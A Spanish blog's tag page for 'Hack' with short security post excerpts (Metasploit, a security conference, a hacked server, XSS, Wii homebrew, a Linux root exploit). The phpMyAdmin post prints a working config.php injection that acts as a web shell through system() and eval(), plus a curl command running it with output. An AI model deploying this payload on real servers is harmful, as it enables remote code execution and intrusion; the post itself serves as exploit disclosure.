Tag: Hack (page 1) ~ Userlinux.net

Buscar

Categorías

Nube de tags

Últimos comentarios

Pro Evolution Soccer 10 vs FIFA 10...
[SOCCER] [SOCCER] [ik]

CakePHP: Foreign key y desplegables...
[Manuel] [r0sk] [joan]

Canal+: Nueva imagen corporativa...
[Luis]

Akinator, el genio de la web...
[ana] [Ana] [sara sanchez ruiz]

Vende enlaces con backlinks.com...
[r0sk] [GDD] [MarcosBL]

Webs amigas

Best Online Casino Blog

Archivo

Year 2010

Year 2009

Year 2008

Year 2007

Year 2006

Year 2005

Year 2004

Year 2003

Year 2002

Diciembre (4)

Promo

Links de interés

Aprendeganar.com

Rooted CON

15.jan.2010
1 Comentarios
328 Lecturas

Hay un nuevo evento en el panorama de la seguridad informática a nivel nacional. Para despistados -que los habrá :D- estoy hablando de la Rooted CON. Un grupo de profesionales -y fanáticos de la seguridad- se han juntado para ofrecer un congreso con conferencias altamente técnicas desde un enfoque práctico y neutral.

Por lo que podemos ver en la sección de ponentes promete demasiado como para ser verdad -¡qué alguien me pellizque!-. Poco a poco se irán confirmando más ponentes y los detalles de cada ponencia:

Chema Alonso, de Informática64.
David Barroso, de S21Sec.
Joxean Koret, de 48bits y Panda Security.
Alejandro Ramos "dab", de SecurityByDefault.
Antonio Ramos, de S21Sec.
David Reguera, de Hispasec Sistemas.
Rubén Santamarta, de ReverseMode y 48bits.

Todavía no sé si podré asistir porque es entre semana (18, 19 y 20 de marzo) y complicado de compatibilizar en horarios con el resto de las obligaciones.

Será uno de los eventos más interesantes del año en cuanto a seguridad y espero que consiga continuidad. Desde aquí my 2€cents en forma de promoción. (Vía Vierito y Rooted CON).

Archived on :

Tags : hack seguridad

OWNED: Servidor en desarrollo

31.dec.2009
7 Comentarios
334 Lecturas

Uno de nuestros servidores de desarrollo ha sido hackeado como decía hace un rato por twitter. Imagino la cara del intruso al ver cuan sencilla era la contraseña.

Empecemos por el principio, las máquinas de desarrollo no están abiertas "al público", son tan solo eso, máquinas con código en pre-producción en las que trabaja el equipo de desarrollo con lo que la seguridad está bastante descuidada (aún sabiendo que el 90% de los ataques provienen desde dentro, yo me fío de mis compañeros).

Con bastantes frentes abiertos, la verdad ni se me ocurrió repasar todos esos puntos que debería haber repasado -si, entono el mea culpa- antes de abrir el equipo a La Red para que un compañero pudiera acceder desde remoto.

Archived on :

Tags : bots server hack

Metasploit: Autopwn

07.nov.2009
0 Comentarios
941 Lecturas

Seguimos descubriendo características de Metasploit y quedándonos boquiabiertos con todo el poder de esta fantástica -y controvertida- herramienta.

Pensándolo con frialdad hasta me he planteado la escritura de este post, me preocupa la ética de los posibles lectores... pero visto de otra forma ni estoy descubriendo nada nuevo ni quiero hacer apología del non full disclosure así que -muy por encima pero- allá vamos.

Archived on : sistemas

Tags : hack metasploit seguridad

Metasploit: idle scanning y el IPID

05.nov.2009
5 Comentarios
420 Lecturas

Hoy intentaremos saltarnos un sistema de detección de intrusos (IDS), al menos en teoría, porque no tengo ninguna maqueta montada para probarlo realmente. A la hora de usar nmap para comprobar la disponibilidad de algunos puertos de una Red es muy posible que cualquier IDS detecte los escaneos y emprenda algún tipo de acción.

El idle scanning se sirve del IPID para echarle el muerto del escaneo a otro ordenador zombie con lo que para hacerlo efectivo debemos -antes de nada- encontrar ese ordenador adecuado al que culpar.

Archived on : sistemas

Tags : hack metasploit seguridad

Historia del hacking

21.sep.2009
2 Comentarios
442 Lecturas

He visto la imagen en Focus.com y en Sabe más el diablo, me ha parecido muy interesante quedarme con una copia -y eso que todavía no he tenido tiempo a leerla entera-, ahí va:

Archived on : sistemas

Tags : historias hack seguridad

Nuevo exploit para phpMyAdmin

10.jun.2009
0 Comentarios
3529 Lecturas

Se trata de un bash que inyecta el config.php de forma que se pueda ejecutar remotamente código arbitrario:


$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'(pre)';system($_GET['c']);echo '(/pre)';}if($_GET['p']){echo
'(pre)';eval($_GET['p']);echo '(/pre)';};//'] = 'localhost';

Por lo tanto en un sistema infectado podremos ejecutar el siguiente comando con éxito:


$ curl "http://dominio-afectado/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x   2 root   root  4096 Mar 11 10:12 bin
drwxr-xr-x   3 root   root  4096 May  6 10:01 boot
drwxr-xr-x  15 root   root 14300 Jun  5 09:02 dev
drwxr-xr-x 147 root   root 12288 Jun  5 09:02 etc
drwxr-xr-x   3 root   root  4096 Oct 18  2008 home
drwxr-xr-x   2 root   root  4096 Jul  2  2008 initrd
[...]

Recomiendo leer el proof of concept con atención.

Archived on : sistemas

Tags : phpmyadmin exploits hack

Hack: XSS oculto en imágenes

09.oct.2008
3 Comentarios
1172 Lecturas

Esta mañana hemos estado probando una nueva forma de XSS: a través de código en imágenes maliciosas }:).

El XSS no es más que un tipo de ataque o agujero basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado (wikipedia dixit).

Espero que se entienda mejor con un pequeño taller de 5 minutos, ejemplo incluido.

Archived on : programación

Tags : xss hack imagenes

Wii: Canal Homebrew

30.aug.2008
0 Comentarios
2234 Lecturas

Una de las cosas que le echaba en falta a la Nintendo Wii era el poder reproducir Divx, tarea imposible con la consola de serie, aunque nada complicado de complementar con un poco de paciencia.

En primer lugar debemos asegurarnos de la versión de la consola puesto que dependiendo de este factor procederemos de una u otra forma:

v.3.2 (U -USA-, E -Europa- ó J -Japo-) - Método chip
v.3.3 - Método Twilight Princess

En el menú de configuración de la Wii podemos conocer la versión de la misma.

Archived on : tecnología

Tags : twlight homebrew wii hack nintendo

Vmsplice: Local root xploit

12.feb.2008
2 Comentarios
2184 Lecturas

El amigo Javi lo explica muy bien por aquí. Yo solamente pretendo poner un par de ejemplos del alcance de la lesión:

Archived on : sistemas

Tags : xploit vmsplice hack linux

Metasploit en OSX

24.apr.2007
0 Comentarios
2249 Lecturas

Metasploit es un framework de xploits y utilidades varias para, entre otros menesteres, probar la seguridad de algún que otro sistema, tests de intrusión (pentests), auditorías, hacking ético o como quieran llamarlo.

La verdad es que dicha herramienta permite conocer ciertas deficiencias de seguridad de sistemas aislados ó redes completas con el fin que cada uno quiera darle.

Metasploit en su versión más reciente (3.0 estable y 3.1 en desarrollo atm) está escrito en Ruby y es multiplataforma. Como es ideal para equipos móviles -portátiles, portables y demás familia- intentaremos instalarlo bajo MacOSX en el MacBook.

Archived on : sistemas

Tags : hack metasploit macosx mac osx

Tag: Hack (page 1) - Userlinux.net

Year 2010

Year 2009

Year 2008

Year 2007

Year 2006

Year 2005

Year 2004

Year 2003

Year 2002